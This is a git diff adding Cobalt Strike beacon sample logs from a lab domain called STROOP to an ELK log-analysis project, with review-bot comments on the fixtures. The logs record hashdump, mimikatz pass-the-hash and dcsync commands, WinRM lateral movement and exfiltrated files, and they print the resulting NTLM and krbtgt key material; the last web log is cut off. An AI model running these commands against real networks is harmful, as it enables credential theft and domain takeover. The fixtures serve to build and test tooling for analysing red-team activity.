+SecurityHealthSystray.exe 4632 7248 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 7532 x64 NT AUTHORITY\SYSTEM 0 +LogonUI.exe 4592 3888 x64 NT AUTHORITY\SYSTEM 2 +dllhost.exe 920 3128 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 4552 x64 STROOP\ADMIN-W.Trommel 2 +rundll32.exe 7372 3284 x64 NT AUTHORITY\SYSTEM 0 + + +03/30 09:04:25 UTC [input] hashdump +03/30 09:04:25 UTC [task] Tasked beacon to dump hashes +03/30 09:04:28 UTC [checkin] host called home, sent: 82501 bytes +03/30 09:04:28 UTC [input] screenshot +03/30 09:04:28 UTC [task] Tasked beacon to take screenshot +03/30 09:04:29 UTC [output] +received password hashes: +bofh:500:aad3b435b51404eeaad3b435b51404ee:e2fb4576f49d1badae64eeb8cd050e19::: +DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9480a886367fa07551dceadca7c741da::: + + +03/30 09:04:34 UTC [checkin] host called home, sent: 197186 bytes +03/30 09:06:30 
UTC [input] inject 7248 x64 smb +03/30 09:06:30 UTC [task] Tasked beacon to inject windows/beacon_bind_pipe (\\.\pipe\msagent_2ebf) into 7248 (x64) +03/30 09:06:32 UTC [checkin] host called home, sent: 255034 bytes +03/30 09:06:33 UTC [output] +established link to child beacon: 10.1.4.10 + +03/30 09:10:36 UTC [input] rev2self +03/30 09:10:36 UTC [task] Tasked beacon to revert token +03/30 09:10:36 UTC [input] pth STROOP\ADMIN-W.Trommel e4a22d8e7bbec871b341c88c2e94cba2 +03/30 09:10:36 UTC [task] Tasked beacon to run mimikatz's sekurlsa::pth /user:ADMIN-W.Trommel /domain:STROOP /ntlm:e4a22d8e7bbec871b341c88c2e94cba2 /run:"%COMSPEC% /c echo 9f46f427eed > \\.\pipe\461092" command +03/30 09:10:36 UTC [input] jump winrm64 S-WIN21 smb +03/30 09:10:37 UTC [task] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\msagent_2ebf) on S-WIN21 via WinRM +03/30 09:10:39 UTC [checkin] host called home, sent: 636639 bytes +03/30 09:10:51 UTC [output] +Impersonated NT AUTHORITY\SYSTEM + +03/30 09:10:51 UTC [output] +established link to child beacon: 10.1.2.10 + +03/30 09:10:51 UTC [output] +received output: +user : ADMIN-W.Trommel +domain : STROOP +program : C:\windows\system32\cmd.exe /c echo 9f46f427eed > \\.\pipe\461092 +impers. : no +NTLM : e4a22d8e7bbec871b341c88c2e94cba2 + | PID 8096 + | TID 2676 + | LSA Process is now R/W + | LUID 0 ; 2184206 (00000000:0021540e) + \_ msv1_0 - data copy @ 0000015374FA4E80 : OK ! 
+ \_ kerberos - data copy @ 0000015374EF5418 + \_ aes256_hmac -> null + \_ aes128_hmac -> null + \_ rc4_hmac_nt OK + \_ rc4_hmac_old OK + \_ rc4_md4 OK + \_ rc4_hmac_nt_exp OK + \_ rc4_hmac_old_exp OK + \_ *Password replace @ 0000015374E3F408 (32) -> null + + +03/30 09:10:51 UTC [output] +received output: +#< CLIXML + + +03/30 09:20:39 UTC [input] sleep 30 +03/30 09:20:39 UTC [task] <> Tasked beacon to sleep for 30s [change made to: Beacon 10.1.3.11@4164] +03/30 09:35:27 UTC [input] ps +03/30 09:35:27 UTC [task] Tasked beacon to list processes +03/30 09:35:43 UTC [checkin] host called home, sent: 36 bytes +03/30 09:35:43 UTC [output] +[System Process] 0 0 +System 0 4 x64 NT AUTHORITY\SYSTEM 0 +Registry 4 88 x64 NT AUTHORITY\SYSTEM 0 +smss.exe 4 404 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 492 512 x64 NT AUTHORITY\SYSTEM 0 +wininit.exe 492 588 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 580 596 x64 NT AUTHORITY\SYSTEM 1 +winlogon.exe 580 684 x64 NT AUTHORITY\SYSTEM 1 +services.exe 588 696 x64 NT AUTHORITY\SYSTEM 0 +lsass.exe 588 732 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 832 x64 NT AUTHORITY\SYSTEM 0 +fontdrvhost.exe 588 844 x64 Font Driver Host\UMFD-0 0 +fontdrvhost.exe 684 852 x64 Font Driver Host\UMFD-1 1 +svchost.exe 696 920 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 968 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 1012 x64 NT AUTHORITY\SYSTEM 0 +LogonUI.exe 684 584 x64 NT AUTHORITY\SYSTEM 1 +dwm.exe 684 652 x64 Window Manager\DWM-1 1 +svchost.exe 696 1008 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1032 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 1052 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1064 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1172 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1192 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1208 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 1256 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1312 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1376 x64 NT AUTHORITY\SYSTEM 0 
+svchost.exe 696 1456 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1484 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1520 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1528 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1644 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1664 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 1692 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1700 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1784 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1792 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1908 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1924 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1976 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 1988 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2008 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1120 x64 NT AUTHORITY\SYSTEM 0 +Memory Compression 4 2128 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2164 x64 NT AUTHORITY\SYSTEM 0 +VSSVC.exe 696 2200 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2224 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 2252 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2300 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2380 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2392 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2432 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2516 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2532 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 2548 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2612 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2628 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 2700 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2792 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2868 x64 NT AUTHORITY\SYSTEM 0 +spoolsv.exe 696 3036 x64 NT AUTHORITY\SYSTEM 0 +OfficeClickToRun.exe 696 3156 x64 NT AUTHORITY\SYSTEM 0 +sysmon64.exe 696 3176 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3188 x64 NT AUTHORITY\NETWORK SERVICE 0 +WaAppAgent.exe 696 3196 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3204 x64 NT AUTHORITY\SYSTEM 
0 +svchost.exe 696 3216 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 3224 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3232 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 3256 x64 NT AUTHORITY\SYSTEM 0 +MsMpEng.exe 696 3288 x64 NT AUTHORITY\SYSTEM 0 +WindowsAzureGuestAgent.exe 696 3300 x64 NT AUTHORITY\SYSTEM 0 +WindowsAzureTelemetryService.exe 696 3348 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3376 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 3392 x64 NT AUTHORITY\SYSTEM 0 +unsecapp.exe 920 3728 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 3928 x64 NT AUTHORITY\LOCAL SERVICE 0 +WmiPrvSE.exe 920 3312 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 4320 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 696 4744 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 4776 x64 NT AUTHORITY\SYSTEM 0 +taskhostw.exe 1256 4688 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 2656 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 696 5428 x64 NT AUTHORITY\LOCAL SERVICE 0 +WaSecAgentProv.exe 3196 6060 x64 NT AUTHORITY\SYSTEM 0 +conhost.exe 6060 6088 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 1076 x64 NT AUTHORITY\LOCAL SERVICE 0 +SgrmBroker.exe 696 5940 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 6068 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 5920 x64 NT AUTHORITY\LOCAL SERVICE 0 +SearchIndexer.exe 696 5636 x64 NT AUTHORITY\SYSTEM 0 +SecurityHealthService.exe 696 4104 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 5788 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 5132 4300 x64 NT AUTHORITY\SYSTEM 2 +winlogon.exe 5132 4592 x64 NT AUTHORITY\SYSTEM 2 +dwm.exe 4592 3272 x64 Window Manager\DWM-2 2 +fontdrvhost.exe 4592 5980 x64 Font Driver Host\UMFD-2 2 +rdpclip.exe 1032 5588 x64 STROOP\ADMIN-W.Trommel 2 +sihost.exe 1520 464 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 4388 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 1116 x64 STROOP\ADMIN-W.Trommel 2 +taskhostw.exe 1256 1748 x64 STROOP\ADMIN-W.Trommel 2 +powershell.exe 1256 1464 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 5652 x64 NT 
AUTHORITY\SYSTEM 0 +conhost.exe 1464 1684 x64 STROOP\ADMIN-W.Trommel 2 +ctfmon.exe 5652 1060 x64 STROOP\ADMIN-W.Trommel 2 +explorer.exe 4684 4632 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 372 x64 STROOP\ADMIN-W.Trommel 2 +ShellExperienceHost.exe 920 6160 x64 STROOP\ADMIN-W.Trommel 2 +SearchUI.exe 920 6276 x64 STROOP\ADMIN-W.Trommel 2 +RuntimeBroker.exe 920 6464 x64 STROOP\ADMIN-W.Trommel 2 +RuntimeBroker.exe 920 6568 x64 STROOP\ADMIN-W.Trommel 2 +powershell.exe 1464 6908 x64 STROOP\ADMIN-W.Trommel 2 +conhost.exe 6908 6916 x64 STROOP\ADMIN-W.Trommel 2 +powershell.exe 1464 7004 x64 STROOP\ADMIN-W.Trommel 2 +conhost.exe 7004 7012 x64 STROOP\ADMIN-W.Trommel 2 +RuntimeBroker.exe 920 2296 x64 STROOP\ADMIN-W.Trommel 2 +iexplore.exe 920 6376 x64 STROOP\ADMIN-W.Trommel 2 +iexplore.exe 6376 2320 x86 STROOP\ADMIN-W.Trommel 2 +smartscreen.exe 920 7204 x64 STROOP\ADMIN-W.Trommel 2 +SecurityHealthSystray.exe 4632 7248 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 7532 x64 NT AUTHORITY\SYSTEM 0 +LogonUI.exe 4592 3888 x64 NT AUTHORITY\SYSTEM 2 +dllhost.exe 920 3128 x64 STROOP\ADMIN-W.Trommel 2 +svchost.exe 696 4552 x64 STROOP\ADMIN-W.Trommel 2 +rundll32.exe 7372 3284 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 696 5168 x64 NT AUTHORITY\SYSTEM 0 +powershell.exe 3284 7776 x64 NT AUTHORITY\SYSTEM 0 +conhost.exe 7776 7548 x64 NT AUTHORITY\SYSTEM 0 +WmiPrvSE.exe 920 1092 x64 NT AUTHORITY\LOCAL SERVICE 0 +SearchProtocolHost.exe 5636 7836 x64 NT AUTHORITY\SYSTEM 0 +SearchFilterHost.exe 5636 8020 x64 NT AUTHORITY\SYSTEM 0 + + +03/30 09:37:47 UTC [input] screenshot 4632 x64 +03/30 09:37:47 UTC [task] Tasked beacon to take a screenshot in 4632/x64 +03/30 09:38:13 UTC [checkin] host called home, sent: 197218 bytes diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.4.10/beacon_702687076.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.4.10/beacon_702687076.log new file mode 100644 index 00000000..18a4e54f --- /dev/null 
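Review bot: The new sample log carries credential-looking material with nothing marking it as lab-only — NTLM and SHA1 hashes for ADMIN-W.Trommel, a cleartext Kerberos password for the L-WIN227$ machine account, and the `received password hashes:` SAM dump — and, judging by the `beacon_*.log` input path in filebeat.yml, this presumably gets indexed into the ELK stack as-is. If these are synthetic values from a throwaway lab domain, say so next to the data, e.g. a README line in `elkserver/mounts/sample-data/`: `All credentials, hashes and keys in these logs are synthetic values from a disposable lab domain (STROOP); none were ever valid outside it.`; if they are not, scrub or replace them before the file is published. The same point applies to the krbtgt dcsync output in the following beacon_702687076.log hunk, whose end is outside this view.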
+++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.4.10/beacon_702687076.log 
@@ -0,0 +1,216 @@
+03/30 09:06:37 UTC [metadata] beacon_22170412 -> 10.1.4.10; computer: L-WIN227; user: ADMIN-w.trommel; process: SecurityHealthSystray.exe; pid: 7248; os: Windows; version: 10.0; beacon arch: x64 (x64)
+03/30 09:06:33 UTC [output]
+established link to parent beacon: 10.1.4.10
+
+03/30 09:06:58 UTC [input] dcsync stroop.local stroop\krbtgt
+03/30 09:06:58 UTC [task] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:stroop.local /user:stroop\krbtgt command
+03/30 09:06:58 UTC [checkin] host called home, sent: 417354 bytes
+03/30 09:06:59 UTC [output]
+received output:
+[DC] 'stroop.local' will be the domain
+[DC] 'S-WIN21.stroop.local' will be the DC server
+[DC] 'stroop\krbtgt' will be the user account
+
+Object RDN : krbtgt
+
+** SAM ACCOUNT **
+
+SAM Username : krbtgt
+Account Type : 30000000 ( USER_OBJECT )
+User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
+Account expiration :
+Password last change : 3/29/2020 9:54:08 AM
+Object Security ID : S-1-5-21-2163199188-2306780613-1636707950-502
+Object Relative ID : 502
+
+Credentials:
+ Hash NTLM: f7cd9145a9b7c2f6e342e2ab85dc540e
+ ntlm- 0: f7cd9145a9b7c2f6e342e2ab85dc540e
+ lm - 0: edb5f8b368bf3e8a7d7323447e185e7f
+
+Supplemental Credentials:
+* Primary:Kerberos-Newer-Keys *
+ Default Salt : STROOP.LOCALkrbtgt
+ Default Iterations : 4096
+ Credentials
+ aes256_hmac (4096) : c6569bece97962c95f12ee527f0cefba22934fe63098b1f9d789347b949ec14b
+ aes128_hmac (4096) : 6f8306a0f0c80d30068dd8e6b4f7fc26
+ des_cbc_md5 (4096) : f70732e5b673b398
+
+* Primary:Kerberos *
+ Default Salt : STROOP.LOCALkrbtgt
+ Credentials
+ des_cbc_md5 : f70732e5b673b398
+
+* Packages *
+ Kerberos-Newer-Keys
+
+* Primary:WDigest *
+ 01 3e05f97129646f6380d255125068cd2e
+ 02 25a5fc433c6b575e4215bd5846f05a4a
+ 03 1063028e974d41cdcb88fe01dbb20bec
+ 04 3e05f97129646f6380d255125068cd2e
+ 05 25a5fc433c6b575e4215bd5846f05a4a
+ 06 0791eb9218513143b8a53ac9aed2176f
+ 07 3e05f97129646f6380d255125068cd2e
+ 08
33255ca329b031d292598c9b9fe7d63b
+ 09 33255ca329b031d292598c9b9fe7d63b
+ 10 c3b59c8eea10bc63de3283ba2ae653f8
+ 11 fc47502b7fc17d42d664d5c7464eb6ec
+ 12 33255ca329b031d292598c9b9fe7d63b
+ 13 cc1fcadc0c9d3971fdfeecb6dce3572e
+ 14 fc47502b7fc17d42d664d5c7464eb6ec
+ 15 fa966dc5f8347c79c7ba6c88119ade18
+ 16 fa966dc5f8347c79c7ba6c88119ade18
+ 17 2aa8b89401f4f93b6a9b11cd36f3188f
+ 18 6caaf3241ccf42403153e44a901e603f
+ 19 49ca18f2b0046b48a76437f3c19b29ef
+ 20 961296ba01fbdad428b891e3a9026565
+ 21 742917cb3f80b2da64e2fa31c06fd1a8
+ 22 742917cb3f80b2da64e2fa31c06fd1a8
+ 23 b3a86bc78731e4347ad6b839c0f844ac
+ 24 fba7489f07fee7d55f109cc4db19a282
+ 25 fba7489f07fee7d55f109cc4db19a282
+ 26 d8ea861857a6e9381b4ae2703a154e89
+ 27 4f1f2ecf0cf9f74318b3275c091efda8
+ 28 fd24b5e823acb8e5fe3029e42e0501ea
+ 29 2c5722f5bc0da4ce5ff26b3c0f93ebd1
+
+
+
+03/30 09:08:02 UTC [input] screenshot
+03/30 09:08:02 UTC [task] Tasked beacon to take screenshot
+03/30 09:08:03 UTC [checkin] host called home, sent: 197186 bytes
+03/30 09:08:30 UTC [input] ps
+03/30 09:08:30 UTC [task] Tasked beacon to list processes
+03/30 09:08:34 UTC [checkin] host called home, sent: 12 bytes
+03/30 09:08:34 UTC [output]
+[System Process] 0 0
+System 0 4
+Registry 4 88
+smss.exe 4 404
+csrss.exe 492 512
+wininit.exe 492 588
+csrss.exe 580 596
+winlogon.exe 580 684
+services.exe 588 696
+lsass.exe 588 732
+svchost.exe 696 832
+fontdrvhost.exe 588 844
+fontdrvhost.exe 684 852
+svchost.exe 696 920
+svchost.exe 696 968
+svchost.exe 696 1012
+LogonUI.exe 684 584
+dwm.exe 684 652
+svchost.exe 696 1008
+svchost.exe 696 1032
+svchost.exe 696 1052
+svchost.exe 696 1064
+svchost.exe 696 1172
+svchost.exe 696 1192
+svchost.exe 696 1208
+svchost.exe 696 1256
+svchost.exe 696 1312
+svchost.exe 696 1376
+svchost.exe 696 1456
+svchost.exe 696 1484
+svchost.exe 696 1520
+svchost.exe 696 1528
+svchost.exe 696 1644
+svchost.exe 696 1664
+svchost.exe 696 1692
+svchost.exe 696 1700
+svchost.exe 696 1784
+svchost.exe 696 1792
+svchost.exe
696 1908
+svchost.exe 696 1924
+svchost.exe 696 1976
+svchost.exe 696 1988
+svchost.exe 696 2008
+svchost.exe 696 1120
+Memory Compression 4 2128
+svchost.exe 696 2164
+VSSVC.exe 696 2200
+svchost.exe 696 2224
+svchost.exe 696 2252
+svchost.exe 696 2300
+svchost.exe 696 2380
+svchost.exe 696 2392
+svchost.exe 696 2432
+svchost.exe 696 2516
+svchost.exe 696 2532
+svchost.exe 696 2548
+svchost.exe 696 2612
+svchost.exe 696 2628
+svchost.exe 696 2700
+svchost.exe 696 2792
+svchost.exe 696 2868
+spoolsv.exe 696 3036
+OfficeClickToRun.exe 696 3156
+sysmon64.exe 696 3176
+svchost.exe 696 3188
+WaAppAgent.exe 696 3196
+svchost.exe 696 3204
+svchost.exe 696 3216
+svchost.exe 696 3224
+svchost.exe 696 3232
+svchost.exe 696 3256
+MsMpEng.exe 696 3288
+WindowsAzureGuestAgent.exe 696 3300
+WindowsAzureTelemetryService.exe 696 3348
+svchost.exe 696 3376
+svchost.exe 696 3392
+unsecapp.exe 920 3728
+svchost.exe 696 3928
+WmiPrvSE.exe 920 3312
+svchost.exe 696 4320
+svchost.exe 696 4744
+svchost.exe 696 4776
+taskhostw.exe 1256 4688
+svchost.exe 696 2656
+svchost.exe 696 5428
+WaSecAgentProv.exe 3196 6060
+conhost.exe 6060 6088
+svchost.exe 696 1076
+SgrmBroker.exe 696 5940
+svchost.exe 696 6068
+svchost.exe 696 5920
+SearchIndexer.exe 696 5636
+SecurityHealthService.exe 696 4104
+svchost.exe 696 5788
+csrss.exe 5132 4300
+winlogon.exe 5132 4592
+dwm.exe 4592 3272
+fontdrvhost.exe 4592 5980
+rdpclip.exe 1032 5588 x64 STROOP\ADMIN-w.trommel 2
+sihost.exe 1520 464 x64 STROOP\ADMIN-w.trommel 2
+svchost.exe 696 4388 x64 STROOP\ADMIN-w.trommel 2
+svchost.exe 696 1116 x64 STROOP\ADMIN-w.trommel 2
+taskhostw.exe 1256 1748 x64 STROOP\ADMIN-w.trommel 2
+powershell.exe 1256 1464 x64 STROOP\ADMIN-w.trommel 2
+svchost.exe 696 5652
+conhost.exe 1464 1684 x64 STROOP\ADMIN-w.trommel 2
+ctfmon.exe 5652 1060 x64 STROOP\ADMIN-w.trommel 2
+explorer.exe 4684 4632 x64 STROOP\ADMIN-w.trommel 2
+svchost.exe 696 372 x64 STROOP\ADMIN-w.trommel 2
+ShellExperienceHost.exe 920 6160 x64
STROOP\ADMIN-w.trommel 2
+SearchUI.exe 920 6276 x64 STROOP\ADMIN-w.trommel 2
+RuntimeBroker.exe 920 6464 x64 STROOP\ADMIN-w.trommel 2
+RuntimeBroker.exe 920 6568 x64 STROOP\ADMIN-w.trommel 2
+powershell.exe 1464 6908 x64 STROOP\ADMIN-w.trommel 2
+conhost.exe 6908 6916 x64 STROOP\ADMIN-w.trommel 2
+powershell.exe 1464 7004 x64 STROOP\ADMIN-w.trommel 2
+conhost.exe 7004 7012 x64 STROOP\ADMIN-w.trommel 2
+RuntimeBroker.exe 920 2296 x64 STROOP\ADMIN-w.trommel 2
+iexplore.exe 920 6376 x64 STROOP\ADMIN-w.trommel 2
+iexplore.exe 6376 2320 x86 STROOP\ADMIN-w.trommel 2
+smartscreen.exe 920 7204 x64 STROOP\ADMIN-w.trommel 2
+SecurityHealthSystray.exe 4632 7248 x64 STROOP\ADMIN-w.trommel 2
+svchost.exe 696 7532
+LogonUI.exe 4592 3888
+dllhost.exe 920 3128 x64 STROOP\ADMIN-w.trommel 2
+svchost.exe 696 4552 x64 STROOP\ADMIN-w.trommel 2
+rundll32.exe 7372 3284
+
+
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/downloads.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/downloads.log
new file mode 100644
index 00000000..9023c91b
--- /dev/null
+++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/downloads.log
@@ -0,0 +1,3 @@
+03/30 09:30:59 UTC 10.1.3.10 358093816 114 /root/cobaltstrike/downloads/fa59012fc passwords.txt.txt H:\
+03/30 09:31:04 UTC 10.1.3.10 358093816 1056424 /root/cobaltstrike/downloads/c006e2856 RecipeTeammeeting_Apr1_newrecipes.pptx H:\
+03/30 09:34:26 UTC 10.1.3.10 358093816 113354 /root/cobaltstrike/downloads/518edf74d sysmonconfig-export.xml \\s-win43\Software\
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/events.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/events.log
new file mode 100644
index 00000000..58204532
--- /dev/null
+++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/events.log
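Review bot: The same principal is cased two ways across these fixtures: this process listing has `explorer.exe 4684 4632 x64 STROOP\ADMIN-w.trommel 2`, while the earlier beacon's listing of the same PID on the same host (L-WIN227) reads `STROOP\ADMIN-W.Trommel`, and events.log mixes `w.tax` with `W.Tax`. Elasticsearch keyword fields are case-sensitive, so any per-user aggregation in the sample dashboards will split one account into two buckets; if the fixtures were anonymised by hand, normalise the casing, and if this is genuinely what Cobalt Strike logged, a one-line note in the sample-data README would keep a later maintainer from "fixing" it. The `[metadata]` line is stamped 09:06:37 but the `established link to parent beacon` output directly below it is 09:06:33, so file order and timestamp order disagree for the first two events; worth confirming that is normal for linked-beacon logs rather than an editing artefact. Finally, this hunk ships the lab's full krbtgt NTLM/AES key material, which is fine for a throwaway lab, but expect secret scanners to flag the hex blobs, so consider an allow-list entry for the sample-data path.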
@@ -0,0 +1,10 @@
+03/30 07:07:24 UTC *** MarcS joined
+03/30 07:55:39 UTC *** initial beacon from w.tax@10.1.3.10 (L-WIN223)
+03/30 08:13:47 UTC *** initial beacon from w.tax@10.1.3.10 (L-WIN223)
+03/30 08:41:18 UTC *** initial beacon from w.tax@10.1.3.10 (L-WIN223)
+03/30 08:44:13 UTC *** initial beacon from W.Tax *@10.1.3.11 (L-WIN224)
+03/30 09:04:07 UTC *** initial beacon from SYSTEM *@10.1.4.10 (L-WIN227)
+03/30 09:06:33 UTC *** initial beacon from ADMIN-w.trommel@10.1.4.10 (L-WIN227)
+03/30 09:10:51 UTC *** initial beacon from ADMIN-W.Trommel *@10.1.2.10 (S-WIN21)
+03/30 15:37:41 UTC *** MarcS quit
+03/30 20:03:00 UTC *** neo quit
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/weblog_80.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/weblog_80.log
new file mode 100644
index 00000000..4f169a88
--- /dev/null
+++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/weblog_80.log
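Review bot: `neo quit` at 20:03:00 has no matching `neo joined` in this day's events.log, so a per-operator join/quit pairing run against the sample set will show an unmatched quit; if that is deliberate (the join happened on an earlier day that is not part of the fixtures), a short remark in the sample-data README would save a reader the search. Note also that the elevated marker is written as a space-separated `*` before the `@` (`W.Tax *@10.1.3.11`, `SYSTEM *@10.1.4.10`), so whatever splits operator from host on `@` needs to strip that token, otherwise the sample yields user values like `W.Tax *`.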
@@ -0,0 +1,365 @@ +2.63.126.116 unknown unknown [03/30 00:34:10 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +37.221.248.237 unknown unknown [03/30 00:50:19 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +171.67.70.85 unknown unknown [03/30 01:02:53 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +195.168.64.90 unknown unknown [03/30 01:16:02 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" +83.97.20.34 unknown unknown [03/30 01:41:45 UTC] "GET /" 404 0 "" "null" +95.255.116.17 unknown unknown [03/30 01:53:44 UTC] "GET /" 404 0 "" "null" +164.68.112.178 unknown unknown [03/30 02:33:11 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" +162.243.128.38 unknown unknown [03/30 04:36:48 UTC] "GET /manager/text/list/" 200 208983 "beacon beacon stager x86" "Mozilla/5.0 zgrab/0.x" +132.232.201.218 unknown unknown [03/30 05:19:31 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:19:31 UTC] "GET /robots.txt" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +132.232.201.218 unknown unknown [03/30 05:19:38 UTC] "GET /" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +132.232.201.218 unknown unknown [03/30 05:19:39 UTC] "GET /l.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +132.232.201.218 unknown unknown [03/30 05:19:43 UTC] "GET /phpinfo.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +132.232.201.218 unknown unknown [03/30 05:19:43 UTC] "GET /test.php" 404 0 "" "Mozilla/5.0 (X11; Linux 
